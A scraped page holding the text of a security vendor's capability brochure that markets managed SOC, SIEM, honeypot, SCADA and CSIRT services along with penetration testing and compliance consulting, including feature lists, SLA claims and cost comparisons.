Final 2016 cyber captive survey
Final 2016 cyber captive surveyFinal 2016 cyber captive survey
Final 2016 cyber captive survey
 
MCGlobalTech Cyber Capability Statement_Final
MCGlobalTech Cyber Capability Statement_FinalMCGlobalTech Cyber Capability Statement_Final
MCGlobalTech Cyber Capability Statement_Final
 
SecureWorks
SecureWorksSecureWorks
SecureWorks
 
How Microsoft Secures its Online Services [WHITEPAPER]
How Microsoft Secures its Online Services [WHITEPAPER]How Microsoft Secures its Online Services [WHITEPAPER]
How Microsoft Secures its Online Services [WHITEPAPER]
 
Microservices_Designing_Deploying.pdf
Microservices_Designing_Deploying.pdfMicroservices_Designing_Deploying.pdf
Microservices_Designing_Deploying.pdf
 

Si InfoSecMiddleEastLR0516

  • 1. Security | Engineering | Technology
  INFORMATION SECURITY
  MANAGED SECURITY SERVICES
  PROFESSIONAL SECURITY SERVICES
  COMPLIANCE CONSULTING
  • 2. CONTENTS
  Solutions & Services, p. 1
  Managed Security Services, p. 2
  Managed Firewall & Managed SIEM, p. 4
  SOC-in-a-Box, p. 6
  Assisted SOC Services, p. 8
  Customer dashboards, p. 10
  White Labeled Managed Services, p. 12
  Advanced Threat Protection and Malware Detection, p. 14
  Managed Honeypot Active Defense, p. 16
  Managed SCADA Security, p. 17
  Continuous Threat Defense Service: Machine Learnt Behavioural Anomalytics, p. 18
  Benefits of Engaging an MSS Provider, p. 20
  Si CSIRT Teams, p. 22
  Professional Security Services, p. 24
  Vulnerability Assessments, p. 26
  Penetration Testing, p. 27
  Web Application Security Testing, p. 28
  Network Risk Assessments, p. 29
  Firewall Migration Services, p. 30
  Network Architecture Review, p. 31
  BYOD, p. 32
  Compliance Consulting, p. 34
  ISMS - ISO 27001, p. 36
  BCP & Management, p. 37
  PCI Compliance & PCIS, p. 38
  Compliance & Security Skills Training, p. 39
  Contact Us, p. 40

  OBJECTIVE
  Born out of a common vision... “we deliver to our clients the very best security services by using innovation, professionalism and our depth of expertise.“
  We deliver on our promise to enhance our clients’ information security posture, lower their total cost of ownership and demonstrate compliance through our managed security and professional services, day in, day out, 24 x 7.

  Managed Services
  • Managed IDS & IPS
  • Firewall management
  • Managed application firewall
  • Log monitoring
  • Log retention
  • SIEM as a service
  • CSIRT (Computer Security Incident Response)

  Professional Services
  • Vulnerability management & testing
  • Penetration testing
  • Web application security
  • Network risk assessment
  • Device configuration & mitigation reviews
  • Cyber forensics
  • BYOD

  Compliance
  • PCI consulting
  • PCI scanning
  • ISO 27001
  • Policies & procedures
  • ITIL readiness & training
  • Business continuity planning

  About Us
  Si is driven by a desire to offer our clients the highest degree of protection against today's cyber threats. We do this by delivering the most customizable approach to security managed services available and by providing a highly tailored and responsive approach for each client. We protect all IT assets, including virtual assets, cloud and traditional infrastructure, using our team of over 150 dedicated security experts from our Security Operations Centres in London, New York, Dubai and Mumbai.
  Established in 2003, with over a decade in Security and Cyber Security consulting and management services, our objective is to place the power of our SOC team into our clients’ hands to provide complete visibility of security events and threats within their environments. Our aim is to become an extension of our clients’ internal teams as a trusted partner.

  Why Us?
  • Dedicated security specialists
  • Global SOCs across 4 continents
  • Powered by industry best technology
  • Powered by industry experts and analysts

  Solutions & Services
  Si provides Managed Security and Professional Security Consulting services to thousands of end customers. Our delivery model utilizes a cloud based information security and compliance solution, which requires no capital expenditure from our clients and is accessible via a secure and innovative customer platform.
  • 3. “Establish a monitoring strategy and develop supporting policies, taking into account previous security incidents and attacks, and your organisation’s incident management policies. Continuously monitor inbound and outbound network traffic to identify unusual activity or trends that could indicate attacks and the compromise of data”
  Extract from the “10 Steps to Cyber Security”, CESG, the information security arm of GCHQ

  We provide the following Managed Security Services:
  • Design of security operations centres (SOCs)
  • Onsite operation of our clients’ SOCs
  • White labeled MSSP solutions
  • A cloud based managed firewall + SIEM service
  • On demand Security Incident Response Teams (SIRT)

  Si enhances the operational efficiency of our clients’ information systems with our Managed Security Services. By optimizing IT asset utilization, risk management and compliance we improve uptime and availability. We design, build and operate security operation centres either onsite at our customers’ locations or in the cloud through our network of security operation centres. We have built, and we operate, security operation centres across London, New York, Dubai and Mumbai. This gives us a proactive 360° view of global threats. We are dedicated to serving a range of customers across verticals such as financial services, telecoms, retail and healthcare, with 80% of our global clients comprising blue-chip Fortune 500 and Government organisations.

  Services and descriptions:
  • Managed Firewall: 24x7 monitoring and managing of customers' security devices (FW, IPS, UTM, WAF and more)
  • Managed SIEM: 24x7 monitoring of customer assets and event correlation (network, servers, apps, databases, FW, IPS)
  • Advanced Threat Protection and Malware Detection: Supply and management of advanced next-generation firewalls, IPSs and malware detection probes with advanced correlation
  • Managed SCADA Security: Supply and management of SCADA firewalls for critical infrastructure (oil & gas)
  • Advanced Threat Management: Supply and correlation of commercial threat feeds (e.g. Norse)
  • Managed Vulnerability Management: Vulnerability management
  • Honeypot Active Defense: Active defense utilising honeypot infrastructure correlated with SIEM for proactive management
  • Managed Web Application Firewall: Supply and management of web application firewalls utilising Citrix NetScaler for defense of web environments
  • Continuous Threat Defense: Advanced behaviour analysis using CyberFlow Anomalytics to detect malicious activity
  • SOC-in-a-Box + 24x7 Monitoring: Supply and management of SOC infrastructure onto a customer site, including the 24 x 7 monitoring of all event sources
  • SOC Staffing Outsource - Onsite: Onsite provision of staffing to monitor, administer and manage customer deployed and owned SOC infrastructure and event sources
  • SOC Staffing Outsource - Offsite: Offsite provision of staffing to monitor customer deployed and owned SOC infrastructure and event sources
  • 4. INFORMATION SECURITY | CAPABILITY STATEMENT | 5
  Managed Firewall / Managed SIEM
  Managing and monitoring security devices is a highly skilled operation that can be a time consuming and resource intensive process. Our managed security services allow our clients to focus on their core business while we concentrate on providing secured networks and systems. The service we offer is 24x7 and is scalable, compliant and cost effective. This service is designed for banking, government and enterprise clients that wish to outsource SIEM services against strict SLAs and compliance requirements. With over 20,000 devices under management, our cloud based service is secured across our redundant global SOCs and offers a resilient and dependable service.

  Summary Features (Managed Firewall and Managed SIEM)
  • 24 x 7 Security Monitoring
  • In Country Log Retention
  • Real Time Incident Response
  • Advanced Event Correlation
  • Event Storage For Forensic Analysis
  • ISO 27001, SANS 20 Compliance Reports
  • 15 Minute SLA Response Time
  • SIEM Powered By LogRhythm
  • Web Based Customer Dashboards
  • Policy & Signature Configuration Changes
  • Weekly Reports
  • Performance, Availability & Threat Management

  What do we manage?
  • Servers (System OS, Applications & Databases): Managed Servers (Windows, Linux, Unix, ESX); Applications; Databases; Email Servers
  • Core Network Equipment: Network Routers / Switches; Network Wireless LAN; Network Load-Balancers / Accelerators; Managed Network AntiSpam / Proxies
  • Network Security Equipment: Managed Firewalls; Managed Network IDS or IPS; Managed Network VPN Routers; Managed UTMs

  Firewall / IDS / IPS / Network Devices / Server Security Services Feature Set (Monitor and Manage)
  • Threat Management: 24x7 Proactive Security Incident Monitoring, Detection & Notification; SIEM Correlation; Security Policy Consultation; Incident Management
  • Configuration Management: Maintain Device Inventory Database; Backup of Device Configuration
  • Fault Management: Availability Monitoring; Fault Detection & Notification; Fault Diagnosis & Resolution; Vendor Management
  • Change Management: Maintain Documentation; Policy & Signature Configuration Changes; OS Updates, Patches & Signatures; Maintain CMDB; Operating System Upgrades
  • Reporting: Basic Reporting; Advanced Reporting
  • Web Portal: Web Based Portal; Access to Threat Feeds
  • Log Retention: 120 days online log retention; 12 months archival (Customisable)

  Architecture diagram: the customer network (managed firewall / UTM / IDS, managed server, business application monitoring, managed switch / router) connects over a secure VPN to the Global Security Operations Center and the SOC co-location center (Tier 3 data centre). All logs stay in country.
  • 5. SOC-in-a-Box
  Si recognises that many clients have a business demand to locate our Security Operations Centre on their premises / data centres. We offer a rapid deployment solution to enable our clients to become operational in a matter of days, including people, processes and technology components. At the heart of the SOC lies an industry leading SIEM (LogRhythm Security Analytics Platform) that is closely coupled with additional modules which may be added at the customer's request to include full SOC functionality.

  Technology Elements
  Our SOC-in-a-Box deployment represents an agnostic approach to the component architecture and provides the choice of vendor to our customers from the following matrix.
  • Core Component: LogRhythm Security Analytics Platform
  • Module 1: Incident Response Workflow Handling: Request Tracker
  • Module 2: Vulnerability Management: Rapid7, Nessus or Qualys
  • Module 3: Advanced Threat Defence: Palo Alto, Cisco Sourcefire or ThreatTrack
  • Module 4: Advanced Threat Intelligence: Norse
  • Module 5: Honey Pot Active Defence: Honeypot Infrastructure - HoneyDrive
  • Module 6: Web Application Defence: LogRhythm Web Application Defense Suite + Third party WAF (Optional)
  • Module 7: Continuous Threat Defence: CyberFlow Anomalytics Suite - Anomaly Detection system

  People (Staffing) Elements
  The heart of an effective SOC operation is the quality of staffing together with robust and tested SOC policies and processes. In all cases, a 24x7 SOC operation is required to ensure a continuous level of monitoring and defence, and whilst this can be cost prohibitive for many organisations we offer three options to achieve this objective.
  Staffing options:
  • Option 1: Remote 24x7 monitoring from our Global Security Operations Centre
  • Option 2: Onsite 24x7 monitoring at our customer’s site location
  • Option 3: Hybrid – Onsite (8x5) team, offsite (evening shift, weekends and public holidays)
  In all cases we ensure that all security logs stay onsite at the customer's SOC infrastructure.

  SOC and Incident Response Processes
  Si’s team has been designing, operating and consulting on SOC deployments globally for over 10 years, and a particular strength is our ability to develop and optimise SOC and Incident Response processes. Whilst this element is often overlooked, we believe this is the single most important ingredient to consistent successes and predictable results. Our clients will benefit from this experience when they partner with Si to deliver our SOC-in-a-Box offering.

  Service Delivery Architecture
  • Step 1, Select Technology: Option 1: LogRhythm Onsite – Buy; Option 2: LogRhythm Onsite – Lease; Option 3: SOC-in-a-Box
  • Step 2, Select Staffing: 24x7 Outsource Onsite Team; 24x7 Remote Monitoring Offsite Team; 24x7 Hybrid Team (Day shift - Onsite Team, Night Shift - Remote Offsite)
  • Step 3, Select Processes: Si SOC Processes; Customer SOC Processes
  • 6. Assisted SOC Services
  Empowered SIEM
  Technology itself is not enough; an efficient SOC team requires a critical balance of people, process and technology. Si partners with LogRhythm to empower our customers to leverage their existing SIEM investments by providing a 24 x 7 Monitoring service offering.

  The Operational Challenge
  SOC operations require highly skilled security professionals to investigate security incidents, perform incident response and forensics and help keep an organization afloat amid a data breach. An enterprise looking to operate a SOC needs to evaluate whether it has the expertise in-house to deliver effective monitoring. The option is to transfer the risk to a specialist SOC operator, and we provide services to support these challenges.

  Key Questions
  Does outsourcing make sense? It does when expertise is not available in-house, or when budget does not allow for the investment needed to employ, house and train a 24 x 7 SOC team.
  Can building a self-contained, well-staffed SOC become cost-prohibitive for many? The answer is yes, primarily due to the resource cost of providing a 24x7 team; after all, cyber never sleeps! However, if budget does not allow for an onsite team then a remote service to deliver log analysis and event monitoring can be an economical option.

  Service Level Assurance
  All services are backed by an SLA:
  • Incidents - 15 minute response
  • Availability - 99.999 Uptime
  • Change Management - 4 hr MTTR

  Security Services Feature Set (Monitor)
  • Threat Management: 24x7 Proactive Security Incident Monitoring, Detection & Notification; SIEM Event Management & Correlation; Security Policy Consultation
  • Configuration Management: Maintain Device Inventory Database; Backup of Device Configuration
  • Fault Management: Availability Monitoring; Fault Detection & Notification
  • Change Management: Maintain Documentation
  • Reporting: Reporting
  • Web Portal: Web Based Portal; Access to Threat Feeds
  • Log Retention: Log Management and Archival
  • SLA: 15 Minute Response Time; Service Credit Backing
  • Dedicated Account Manager: Dedicated technical account manager

  Benefits – Cost & Performance
  The adoption of “Assisted SOC” is motivated by three key messages: “Less Cost”, “Increased Performance” and “Service Assurance (SLA)”. We demonstrate to our customers that we deliver SOC monitoring services better and for less than the cost of an in-house service.

  Options
  We recognize that not all businesses are the same and so we support the following deployment models:
  • Onsite SOC Teams
  • Offsite Remote SOC Team (Remote Monitoring)
  • Hybrid – Day Shift Onsite / Nightshift Offsite

  Sample Use Case – Customer X
  A customer requires a 24x7 monitoring service to support their LogRhythm Security Intelligence platform with an average throughput of 1,000 messages per second (MPS).

  Cost Assumptions
  The following cost assumptions are used for the cost benefit assessment (SOC Operator, L1):
  • Salary ($50,000/yr): $4,166 / mth
  • Overhead (20% Salary): $818 / mth
  • Desk Space: $921 / mth
  • Others: $767 / mth
  • Total Cost to Employ: $6,672 / mth
  Note that a 24x7 operation requires a 5 shift model and a minimum of 5 dedicated SOC operators.

  What is Included?
  • Customer X, in-house team: Cost / mth of 24x7 monitoring team: 5 x $6,672 = $33,360; Performance + skills level: difficult to achieve with an in-house team; SLA response: ? (difficult to track and manage). Result: Expensive, no service guarantee + performance risk + staff risks.
  • Si remote outsource team: Cost / mth of 24x7 monitoring team: $7,000; Performance + skills level: Si dedicated security professionals; SLA response: 15 minute response. Result: Less cost + better service assurance.
  • 7. Customer dashboards
  Si’s customer dashboards offer end-to-end support to the operations of SOCs and Managed Security Service Providers (MSSP). They have unique features to help Service Providers set up their operations in minimum time.

  Unified Interface for Operations
  Si provides a unified interface for the monitoring & management of one or more networks across multiple aspects. The portal is able to collate & analyse customer log data and integrates security intelligence tapped from global sources with analytical tools.
  Customer specific information:
  • Customer account information
  • Security incidents & events
  • Availability of critical hosts and services
  • Performance of vital systems and network interfaces
  • Vulnerabilities on critical systems and applications
  • Incident & change management
  Non-customer specific information:
  • Integrated analytical tools for forensic analysis
  • Access to reliable security intelligence
  • Geographical information

  High Scalability & Technology Agnostic
  Si’s customer dashboards are highly scalable and can integrate with almost any Java, ASP or Web based application:
  • Technology agnostic interface to normalized information
  • Improved operational efficiency through ease of analysis & automation
  • Enhanced Web 2.0 features for user collaboration
  • Flexibility to integrate with other security & network products and appliances

  Vulnerability Posture Dashboard
  A high level view of the security posture across an enterprise based on scans performed on the infrastructure, patch level, misconfigurations and categorisation of vulnerability.

  Service Management
  Management and tracking of performance against service level agreements.

  Knowledge Base
  Database of over 100,000 vulnerabilities and 15,000 signatures, with an in-built correlation engine to assist incident management and forensics.

  Security News Feeds
  Current security trends and news feeds validated in real-time through various sources and security advisory organizations.

  Security Incident Management
  Complete tracking of incident handling through a triage of identification, prioritization and remediation.

  Customizable Dashboard
  The customizable dashboard presents an overview of security incidents across the enterprise: key statistics of infrastructure areas that either require more attention or events that provide a larger picture.

  Service Centre
  Service centre for opening, tracking and drill downs from incident details to resolution. Single portal for change management.

  Security Threat Analysis
  The Dashboard provides a high level summary of how incidents are categorized based on their severity and the location that needs more attention.
  • 8. White Labeled Managed Services
  We provide a service that allows our Partners to re-sell our managed security services as a white labeled service. Our process & technology allow our Partners to deliver ‘in the cloud’ IT services, with no capital investment, to provide a world class, 24x7 managed security service. Si takes care of the technology and the expertise using our global operations centres, allowing our partners to take care of their customers’ security needs.

  Customer Platform
  Our partners benefit from our innovative Customer Platform that enables complete account management for reporting, ticketing, fault management, threat & vulnerability management, customized dashboards, news and knowledge base. Our web user interface sets the benchmark globally for customer interfacing and allows both partners & end customers a live 360° view of their assets, service fulfilment and SLA performance.
  Platform highlights:
  • Customised with our end customer’s logo
  • Customised with our partner’s logos and colours
  • News, dashboards & knowledge base
  • Reliant proactive analytics & reports
  • Complete SLA management & incident workflows
  • Drag and drop dashboard builder; easily customisable dashboards
  • Global Security Operation Centres
  • Easy change request workflows
  • One click management reports

  Customised Platform
  Our clients’ end customers benefit from our unique multi-service delivery platform that can customize the services they like to offer, define the look and feel and set up their SLA support and escalation procedures. Our MSSP partners are traditionally telecoms operators and security hardware vendors who seek to offer managed services to their existing client base.

  MSSP Services
  We can facilitate our partners to provide their end customers with:
  • Managed firewall
  • Managed UTM and IDS
  • Managed switch and router
  • Application management
  • Vulnerability management
  • Threat management
  • Fault management
  • 9. INFORMATION SECURITY | CAPABILITY STATEMENT | 15 Advanced Threat Protection and Malware Detection Si defends our customer networks against threats by using a market leading Next Generation Intrusion Prevention System and deep integration into our SIEM platform (Powered by LogRhythm) to provide multi-dimensional behavioural analytics, extended visibility and continuous monitoring for real-time threat detection response. The Next Generation Firewalls which we support or supply include: • Palo Alto • Cisco Sourcefire • ThreatTrack • Fortinet Summary Features The feature set summary is provided as follows: • 24 x 7 monitoring management • Real time incident response system • Advanced malware protection next generation IPS • Packet level forensics and sandboxing • Network behaviour analysis • Integration with our next Gen SIEM for behavioural analytics • Behavioural whitelisting • Statistical baselining • Real-time threat management • Continuous Compliance • Host network forensics • Real-time contextual awareness Use case LogRhythm incorporates Next Gen FW security and advanced malware protection via the secure eStreamer API and correlates it against other security device and machine logs to deliver multi-dimensional behavioural analytics, extended visibility and continuous monitoring for real-time threat detection response. 
The integration provides:
• Deeper visibility and contextual awareness into network events, with advanced correlation to deliver enterprise-wide threat detection
• Threat intelligence to help detect advanced malware attacks and realize the extent of the outbreak for fast remediation
• Automated action against advanced persistent threats (APT) and zero-day attacks
• Unparalleled expertise through the Si SOC Team, LogRhythm Labs™ and Sourcefire’s Vulnerability Research Team (VRT)

Service benefits:
• No Capex investment required
• Detect advanced malware and realize outbreak extents for fast remediation
• Automated and immediate action against threats such as APT and zero-day attacks
• Multi-dimensional behavioural analytics
• 24x7 monitoring and real time event contextualization

Service Architecture

Si partners with leading Next Generation Firewall vendors (Palo Alto, Sourcefire or ThreatTrack) to incorporate their advanced threat detection technology and sandboxing with our SIEM platform (powered by LogRhythm), and correlates it against other security devices and machine data throughout the IT environment.
Managed Honeypot Active Defense

A honeypot is a security resource deliberately designed to be probed, attacked and compromised, for the purpose of gathering intelligence around an attacker. By using honeypots to create better context around threats, we are able to provide a more proactive defence posture. Our automated and integrated approach to honeypots eliminates the need for the manual review and maintenance associated with traditional honeypot deployments.

How It Works

Si deploys honeypot infrastructure into customer DMZ environments to analyse malicious events by continuously monitoring honeypot event activity utilising our SIEM platform (powered by LogRhythm). We perform real-time, advanced analytics on all activity captured in the honeypot, including successful logins, observed successful attacks and attempted/successful malware activity on the host, and use this data to create a defensive posture.

1. Deploy a honeypot specific to the customer requirement
2. The SIEM (powered by LogRhythm) tracks the attacker’s actions
3. Analyse the honeypot data to create profiles of behavioural patterns and attack methods
4. Apply a defensive posture for the detected profiles and signatures

The Honeypot Security Analytics Suite delivers:
• Continuous monitoring of honeypot data
• Customized threat research for strategic defence
• Automated breach prevention and response
• Dynamic security intelligence
• Real time monitoring
• Low cost approach for customer specific signatures
• Fault management

Managed SCADA Security

Today, remotely deployed field devices and SCADA systems are increasingly brought into the IT environment and communicate over IP. This convergence of Operational Technology (OT) and Information Technology (IT) has opened up new points of attack, or “threat vectors”, for hackers. Si has countered this threat by providing SCADA firewall technology which is integrated into our SIEM (powered by LogRhythm) for 24x7 monitoring, threat and incident detection. The service is delivered using the Palo Alto Networks SCADA Firewall, which is one of the only Layer 7 firewalls available for SCADA-based environments.

Service Features
• Secure critical infrastructure, power grids, oil/gas pipelines and industrial plant
• Supports DNP3, Modbus/TCP, EtherNet/IP, IEC 61850, PROFINET and BACnet
• Layer 7 application protection and analysis for Industrial Control System languages and traffic
• Strong policy enforcement for more granular control over industrial data inputs
• Uniform secure access from control networks to sensors
• Translation of SCADA data formats into IP protocols
• SIEM integration and robust event logging
• All security logs remain in country
• Real time incident response system
• Real time events from the firewall
• Storage of the events for forensic analysis
• Customisable event correlation

Service benefits:
• Secure critical infrastructure, power grids, oil/gas pipelines and industrial plant
• No Capex investment required
• 24x7 monitoring
• Secure SCADA networks
• Minimise the business risk of security breaches
• Achieve compliance requirements
• Strict SLA response

The customer interfaces with the MSSP SOC team via the customer portal, where they have access to:
• SLA tracking
• Ticketing and troubleshooting
• Threat management dashboards
• Knowledge base for incident response and analytics
Continuous Threat Defense Service: Machine Learnt Behavioural Anomalytics

Si partners with Cyberflow Analytics™ to provide a service that detects operational anomalies within packet communication behaviour to determine high risk activities and threats. It is the only system that can provide “Anomalytics”: a real-time, streaming, machine-learning, behavioural analytics solution which can instantly detect anomalous and suspicious activities within an organization and alert its operational and security practitioners. This system and service uses Anomalytics to provide real-time cyber-security threat detection at scale, and in situations where traditional security products are failing to adequately identify and detect advanced polymorphic attacks and other anomalous lateral behaviour within organizations.

How it Works
• Collects raw packet meta data
• Machine learns the normal packet communication behaviour of clients, servers and protocols, and visualizes anomalous high risk threats
• Finds operational anomalies such as SNMP event storms, odd port/app activity and changes in IoT sensor communications
• Automated clustering of breach activity tracks Advanced Persistent Threats (APTs)
• Uses a SPAN port configuration to collect data
• Operates within VMs on any customer virtualized infrastructure (lightweight data footprint)

Service Benefits
• It is able to monitor traffic effectively over the entire network, as opposed to traditional security products which monitor only segments of a network
• The service can detect APTs which other analytics methods cannot capture
• Cost effective and scalable
• Real time monitoring
• Integrated with SIEM

Service Architecture
1. Deploy virtual machine network, app and device sensors that monitor systems to feed the “Anomalytics Fusion Engine”.
2. Execute multiple, real-time analytical models to construct self-organizing maps which present high risk behaviour.
3. Cross-correlate the maps against a behavioural policy framework.
4. Correlate the real-time anomaly threat detection and alerts through our SIEM to drive rapid incident response and forensics.

Dashboards

The following image represents a dashboard identifying the high risk traffic occurring within the network utilising port level analytics. [Figure: “Anomalytics Fusion Engine” dashboard]
Benefits of Engaging an MSS Provider

Cost
“The cost of a managed security service is typically less than hiring in-house, full-time security experts.” (Wilbanks, 2001)

Staffing
“A shortage of qualified information security personnel puts tremendous pressure on IT departments to recruit, train, compensate, and retain critical staff.” (Hulme, 2001) An MSSP transfers this responsibility. In addition, “if a client organization can outsource repetitive security monitoring and protection functions, then they can focus internal resources on more critical business initiatives” (Pescatore, 2001).

Skills
“MSSPs have insight into security situations based on extensive experience, dealing with hundreds or thousands of potentially threatening situations every day, and are some of the most aggressive and strenuous users of security software.” (Navarro, 2001; DeJesus, 2001) “In-house staff members who only deal with security on a part-time basis may only see a limited number of security incidents.” (Hulme, 2001)

Facilities
“MSSPs can also enhance security simply because of the facilities they offer.” (DeJesus, 2001) These are physically hardened sites with state-of-the-art infrastructure managed by trained personnel.

Objectivity and Independence
An MSSP can provide an independent and objective perspective on the security posture of an organization. An in-house team often cannot be objective and certainly is not independent.

Security Awareness
“It is difficult for an in-house team to track and address all potential threats and vulnerabilities as well as attack patterns, intruder tools, and best security practices.” (Alner, 2001; Navarro, 2001) By contrast, an MSSP is often able to obtain advance warning of new vulnerabilities and gain early access to information on countermeasures.

Service Performance
The MSSP service can report near real-time results, 24 hours a day, 7 days a week and 365 days a year, guaranteed against an SLA. This contrasts sharply with an in-house service that may only operate during normal business hours.

Service Security and Technology
“Service security solutions and technologies such as firewalls, intrusion detection systems (IDSs), virtual private networks (VPNs) and vulnerability assessment tools are far more effective because they are managed and monitored by skilled security professionals.” (Wilbanks, 2001)

MSSP Benefits: The Business Case for Managed Security Services
• 27% recurring annual saving
• 200+ dedicated security professionals
• 360° view of global threats
• We are built for big data
• 20% technology but 80% interpretation
• 94% initial cost savings
• SLA: 15 minute alert for high priority events
Si CSIRT Teams

Si has been running a Computer Security Incident Response Team (CSIRT) for many years. Through the development of our own SOC and our clients’ SOCs, our staff are some of the most qualified and experienced incident response engineers in the market place.

[Figure: Malware Sophistication vs Time, 1998 to 2013. Milestones shown: Mydoom and Sasser (record for most damage); C&C communications moving from standard IRC ports to non-standard IRC ports, HTTP/HTTPS, social media (Twitter/Facebook) and P2P; automated DDoS; 0-day threats now commonplace; fast-flux DNS now widespread; new wave of DLL hijacking; first major cyber warfare attack; the rise in nation state malware; Flame, the most sophisticated malware yet.]

CSIRT Skills and Experience

Si follows the best industry standards and guidelines for incident response. The increasing sophistication and impact of malware attacks emphasises the need for companies to retain the services of a professional CSIRT team. Our CSIRT engineers are highly experienced and maintain a tool kit of skills including:
• Vulnerability management
• Penetration testing
• Botnets
• Sandbox
• Honeypot
• Forensic analysis

Why hire a professional CSIRT?

The inability of companies to prepare for possible cyber-attacks from incredibly resourceful criminals is one of the most pressing issues facing global chief executives. The increasing sophistication of attacks, which renders even the most technology savvy organizations vulnerable, means that few organizations have the means to employ staff with the ability to respond effectively. We offer an incident response service that allows our customers’ organizations to benefit from our skills and experience.

Rapid Response CSIRT Services
• Incident response
• Reverse engineering/analysis
• Advanced threat alerting
• Forensics
• Malware analysis
• Assessments
• Audits
• Script development
• Remediation and recovery

Si CSIRT Lab

Through the development of our own SOC, our CSIRT lab comprises an extensive library of incident case files that are key for supporting analysis and mitigation measures. The very fact that Si has SOCs around the world gives our CSIRT teams a unique insight into a wide range of threats and risks, enabling us to react faster to such incidents. Each member of the team has access not only to the labs, but to this global resource.

CSIRT Services

We offer our professional services to enterprise, telecom and government organisations on a cost effective basis. The available options for procuring these services include:
• Staff secondment
• Retainer leased rapid response teams
• Remote CSIRT teams

The security incident management team activities follow the CERT/CC Incident Handling Life Cycle (Figure 5): incident reports arrive by email, information request, vulnerability report, hotline/helpdesk, call center, IDS or other sources; they are triaged, analyzed (obtaining contact information, coordinating information and providing technical assistance), responded to and resolved.
“Eighty percent of the intrusions of your networks today can be handled by patches, anti-virus and user actions. We spend 90 percent of our time on the 80 percent of the issues that could be handled by good hygiene.”
Brigadier General Paul Nakasone, Deputy Commander, U.S. Army Cyber Command

Professional Security Services

Si’s Professional Security Services provide enterprise-wide assessments, design and deployment services to build secure and resilient IT infrastructures. Our delivery model is based on industry best practices and technologies that are aligned to our clients’ IT infrastructure and business processes. Our services create a foundation that enables our clients to address key risk management and compliance challenges.
• Vulnerability Assessments
• Penetration Testing
• Web Application Security Testing
• Network Risk Assessments
• Network Architecture Reviews
• Device Configuration and Migration Reviews
• Cyber Forensics

According to the Davos World Economic Forum, 2013 (the Global Agenda Survey), “Cyber Risks” were ranked as the 3rd largest underestimated risk to world development, ahead of sovereign debt, education and protectionism.
Vulnerability Assessments

Si’s Vulnerability Assessment (VA) service provides our clients with the ability to identify and mitigate security gaps associated with their IT assets, thereby enhancing their overall security posture. Our assessments meet the mandatory compliance requirements and provide a proactive measure to stay one step ahead of threats.

Our Vulnerability Assessment provides:
• On-demand proactive vulnerability management for organisations
• Visibility, awareness and consistency across our clients’ organisations
• Tracking of asset ownership, pinpointing of rogue devices, and detailed asset discovery and profile reporting
• Reduced investment in tools and technology
• Comprehensive remediation solutions
• Complete remediation procedures to mitigate identified vulnerabilities

Features include:
• A robust policy template to enable security configuration compliance
• Compliance-based reports (PCI, HIPAA, GLBA, FISMA and SOX)
• Customisable, multi-view reports that make the most of existing security investments
• Audit-ready reporting and certified technical support teams
• Internal and external vulnerability scans
• Best practices (ITIL, OSSTMM and the ISO 27001 security standard)
• Instant access to Secure-I security intelligence and research

Penetration Testing

Interconnected corporate networks of partners, clients, remote offices, wireless LANs, vendors and the Internet have created multiple avenues for an attacker to target companies. Organisations face greater risks to customer data, intellectual property and financial records. CIOs and CFOs must have a clear understanding of risks and vulnerabilities to protect their organizations from external attacks.

Our Penetration Testing services enable our clients to:
• Identify existing and potential vulnerabilities and risks from external attacks
• Utilise experienced security analysts with the specialized skills and tools needed to mitigate client risk
• Conduct testing in a safe and controlled environment without compromising routine business activities
• Reduce the investment associated with employing full time security analysts, tools and technologies
• Integrate with an overall risk management solution to address the audit requirements of policy and compliance frameworks such as ISO 27001, SOX, HIPAA, PCI etc.

Features include:
• Executive summaries (jargon-free, true executive-level summaries)
• Priority matrices, indicating remediation priorities and risks
• Detailed impact analysis of the identified vulnerabilities
• Findings and recommendations to improve security postures
• Knowledge transfer to clients’ IT teams

Penetration testing methodology (figure):
1. Information gathering: active and passive reconnaissance
2. Target discovery: finalizing the scope
3. Scanning and fingerprinting: identifying the underlying technology and services
4. Logical segregation of targets: grouping targets based on attack vectors, namely applications (web servers, database servers, mail servers, SSH, FTP), operating systems (Windows, Linux, Unix/Solaris), web based applications (e-commerce, B2B, custom websites, appliances) and perimeter devices (network security appliances)
5. Vulnerability identification: locating known and unknown vulnerabilities
6. Vulnerability analysis: filtering and confirming attack methods
7. Penetration and exploitation: confirming existing vulnerabilities
8. Impact analysis: extent of business impact due to vulnerability exploitation
9. Reports: detailed findings, management report and executive summary, with data correlation and mitigation strategies
Web Application Security Testing

IT applications allow our clients to directly access personal and confidential information, encouraging a self-driven model and decreasing costs. Critical business functions are dependent on the successful functioning of IT applications. There is an exponential increase in vulnerabilities found in Web Applications, creating a significant impact on our clients’ enterprises and the privacy of the end users. Business losses can include loss of data, public image and loss of confidence.

Our Web Application Security Testing allows our clients to:
• Get instant feedback and catch hidden bugs before launch
• Create higher quality applications, as they are tested by certified QA experts
• Deploy applications faster by testing throughout the development process
• Use global testing coverage by testing across operating systems, browsers, languages and more
• Gain a better understanding of potential website vulnerabilities that may be visible from the Internet

Features include:
• Identification of technical and logical vulnerabilities such as SQL injection, cross-site scripting, I/O data validation, exception management etc.
• Ability to determine remediation steps and counter-measures
• Detailed technical information report covering the nature of the defect, the code locations, the impact of the defect and the remediation solutions

Testing approaches:
• Black Box Testing: we perform attack testing assuming the identity of an external attacker/hacker, with no inside information about the application.
• Grey Box Testing: we receive basic information about the design and function of the Web app. Grey Box testing is a fusion of black and white box testing.
• White Box Testing: we receive complete information on coding, infrastructure and architecture, and perform a full source code and infrastructure review.

Network Risk Assessments

A thorough evaluation of network security posture is mandatory to enable our clients to answer the following fundamental questions:
• What is their enterprise security strategy, and what can be done to protect it in a better way?
• Where are the weaknesses in their security policies and architecture?
• How can they make security data actionable and get timely compliance reports to address audit requirements?
• How much does an effective risk management solution cost?

Our Network Risk Assessment includes:
• A Security Policy Audit – evaluating security policies based on availability, business continuity and compliance requirements; it also establishes key risk factors and security metrics
• A Technical Security Evaluation – analyzing the security architecture in the context of security policies and control objectives to uncover vulnerabilities
• A Threat Management Assessment – examining threat identification, investigation and incident response processes
• Disaster Recovery and Business Continuity Planning – ensuring that plans for returning systems to operational standards are in place

Features include:
• Comprehensive documentation and presentation of findings
• A prioritised list of remediation steps
• Practical recommendations focusing on both the risk and the cost associated with it
• Action plan – short and long term – to achieve compliance and business objectives
Firewall Migration Services

